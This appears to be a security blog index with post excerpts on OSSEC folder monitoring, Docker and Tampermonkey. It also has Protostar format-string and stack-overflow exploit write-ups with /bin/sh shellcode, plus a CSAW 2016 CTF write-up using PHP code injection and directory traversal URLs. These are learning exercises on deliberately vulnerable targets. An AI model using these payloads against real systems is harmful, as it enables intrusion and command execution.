Posts

Experience in folder monitoring with OSSEC

Today I had a job related to folder monitoring. For my solution I selected OSSEC with ELK. I spent 5 hours troubleshooting OSSEC. :)) This is the first time I have configured it.
You can use syscheck for folder monitoring. References: http://ossec-docs.readthedocs.io/en/latest/faq/syscheck.html and http://ossec-docs.readthedocs.io/en/latest/manual/syscheck/
To monitor file edits and deletions, you can use syscheck with realtime monitoring.
But to monitor file additions, you need to:
Add to local_rules.xml
Edit ossec.conf:

The main problem: you must edit ossec.conf on the server (in my case Wazuh), not on the Windows client. Second problem: after a file's integrity changes more than 3 times, OSSEC stops alerting on it. You must set auto_ignore to no in syscheck (on the server). This is my result:
----------------------------------------------------------
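As an added example (not the post's own configuration, which did not survive), the two server-side pieces the post describes: a syscheck block for the server's ossec.conf that enables new-file alerting and disables auto_ignore, and an override of OSSEC's built-in rule 554 in local_rules.xml so that "file added" events alert instead of staying at the default level 0. The monitored directory path is an assumption; the directories list itself belongs with the agent's syscheck configuration.

```xml
<!-- ossec.conf on the OSSEC/Wazuh server (alert_new_files and auto_ignore are evaluated here) -->
<ossec_config>
  <syscheck>
    <!-- Full scan interval; realtime monitoring fills in events between scans -->
    <frequency>3600</frequency>
    <!-- Without this no "file added" event is generated at all -->
    <alert_new_files>yes</alert_new_files>
    <!-- Default is yes: a file that changes more than 3 times is then silently ignored -->
    <auto_ignore>no</auto_ignore>
    <!-- Example monitored folder (assumed path); on an agent this goes in its own syscheck block -->
    <directories check_all="yes" realtime="yes">C:\Shared\Finance</directories>
  </syscheck>
</ossec_config>

<!-- local_rules.xml: built-in rule 554 ("File added to the system") ships at level 0,
     so it never alerts. Overwrite it with a non-zero level so new files reach
     alerts.log and, from there, ELK. -->
<group name="local,syscheck,">
  <rule id="554" level="7" overwrite="yes">
    <category>ossec</category>
    <decoded_as>syscheck_new_entry</decoded_as>
    <description>File added to the system.</description>
    <group>syscheck,</group>
  </rule>
</group>
```

After restarting the server, a new file under the monitored folder should appear as a rule 554 alert; if it does not, check that the agent's syscheck scan (or realtime) actually covers the path.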
Thanks for reading
--------------------------------------------------------------------------
Security Research
SecurityLab - Linux Lab -- Window and Cisco Lab
to be continued -…

Exploit Exercises - Format String

Format1:
Padding to last mem dump
run `python -c 'print "\x38\x96\x04\x08"+"AAABB"+"%x."*143'`%x
Write
run `python -c 'print "\x38\x96\x04\x08"+"AAABB"+"%x."*143'`%n
DMA
/opt/protostar/bin/format1 `python -c 'print "CC"+"\x38\x96\x04\x08"+"AAA%142$n"'`
Format2 needs a value written to an address:
POC:
python -c 'print "\xe4\x96\x04\x08%42x"+"%x."*2+"%n"' > foo
|Address|Value|Padding|%n

DMA
python -c 'print "\xe4\x96\x04\x08"+"%60u%4$n"'  |  /opt/protostar/bin/format2

Format3: write 4 bytes to a specified address. POC:
python -c 'print "\xf4\x96\x04\x08"+"%x"*10+"%11x%n"+"BB"+"\xf5\x96\x04\x08"+"%x"*6+"%475x%n"+"B"+"\xf6\x96\x04\x08"+"%x"*4+"%136x%n"+"B"+"\xf7\x96\x04\x08"+"%x&qu…

Exploit Exercises - Protostar Stack 7

In this level, the app checks that the return address does not start with 0xbxxxxxxx. So I use a pop pop ret gadget to pull the return address from the stack and jump to it.
Found pop pop ret at: 0x08048492
This payload:
| "A" * 80 | pop pop ret address | 8 bytes junk | NOP sled address | NOP sled (to absorb address shifting) | shellcode |
This is shell code:
\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80
Load the PoC into gdb, debug, set breakpoints, etc. I found the NOP sled starts at 0xbffff698. OK, build the PoC:
(python -c 'print "A"*80 + "\x92\x84\x04\x08" + "C"*8 + "\x98\xf6\xff\xbf" + "\x90"*40 +"\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"';cat)
And run it:
(python -c 'print "A"*80 + "\x92\x84\x04\x08" + "C"*8 + "…

Exploit Exercises - Protostar Stack 6

Free time: I had some time to play exploit-exercises. Today I played stack level 6 and gained some experience with return-to-libc.
Use gdb to disassemble:
# gdb -q /opt/protostar/bin/stack6
(gdb) disas main
Dump of assembler code for function main:
0x080484fa :    push   %ebp
0x080484fb :    mov    %esp,%ebp
0x080484fd :    and    $0xfffffff0,%esp
0x08048500 :    call   0x8048484
0x08048505 :    mov    %ebp,%esp
0x08048507 :    pop    %ebp
0x08048508 :    ret
End of assembler dump.
(gdb) disas getpath
Dump of assembler code for function getpath:
0x08048484 :    push   %ebp
0x08048485 :    mov    %esp,%ebp
0x08048487 :    sub    $0x68,%esp
0x0804848a :    mov    $0x80485d0,%eax
0x0804848f :    mov    %eax,(%esp)
0x08048492 :    call   0x80483c0
0x08048497 :    mov    0x8049720,%eax
0x0804849c :    mov    %eax,(%esp)
0x0804849f :    call   0x80483b0
0x080484a4 :    lea    -0x4c(%ebp),%eax
0x080484a7 :    mov    %eax,(%esp)
0x080484aa :    call   0x8048380
0x080484af :…

Some experience when use Docker

This week my job was to set up ELK with Suricata. I chose Docker as the platform to run everything, so now I have some experience with Docker.
Use docker-compose. It is very good for production deployment: build && run.
Install docker-compose via pip.
Use a built image to create your custom start-up distro.
I used docker-compose version 2 syntax; notice the differences between versions, like network vs net.
Use the network setting (--net) if you need to monitor traffic or use all network cards.
You cannot use the cd command; you must use WORKDIR. Read the Dockerfile documentation very carefully.
Use links; when you use them, the linked container is started first. You can also start it manually and start the main container afterwards. Make sure it has started.
In the Docker command, you must use a command that holds the tty, like: suricata -c xxx or python manager server 0.0.0.0:8080

Tampermonkey HelloWorld and create menuCommand

Today I needed to write a script with Tampermonkey. It is very hard :(.
To write hello world, create a new script.
Edit the config: add
// @connect      *
// @match        http://*/*
// @match        https://*/*
You can edit author, homepage, etc.
Add your code below the header comment block, in the main code. I used console.log()
This is the result:
I needed to create a button in the menu, so I used:
Edit the config: remove grant none and add: // @grant        GM_registerMenuCommand

You will see a new menu button in Tampermonkey.

[Writeup] CSAW CTF 2016

mfw (125)
This is the main URL:
http://web.chal.csaw.io:8000

Fuzzing it is easy:
http://web.chal.csaw.io:8000/?page=about%27.phpinfo%28%29.%27

Play with the flag:
http://web.chal.csaw.io:8000/?page=about%27.system%28%22cat%20templates/flag.php%22%29.%27
flag{3vald_@ss3rt_1s_best_a$$ert}


wtf.sh 1 (150)

http://web.chal.csaw.io:8001
Register an account and log in.
Create a post, view the post.
Fuzzing now, I found directory traversal (WTF? traversal again).
When fuzzing to http://web.chal.csaw.io:8001/post.wtf?post=zabOA/../../ I found some source code. I guess maybe I can read all files in this directory, like cat * :)).

I found some interesting functions (after using a decoder to view the beautified code):

function hash_password {
    local password=$1;
    (shasum <<< ${password}) | cut -d\  -f1;
}
# hash usernames for lookup in the users_lookup table
function hash_username {
    local username=$1;
    (shasum <<< ${username}) | cut -d\  -f1;
}
# generate a random token, base64 encoded
# on GNU base64 wraps at 76 …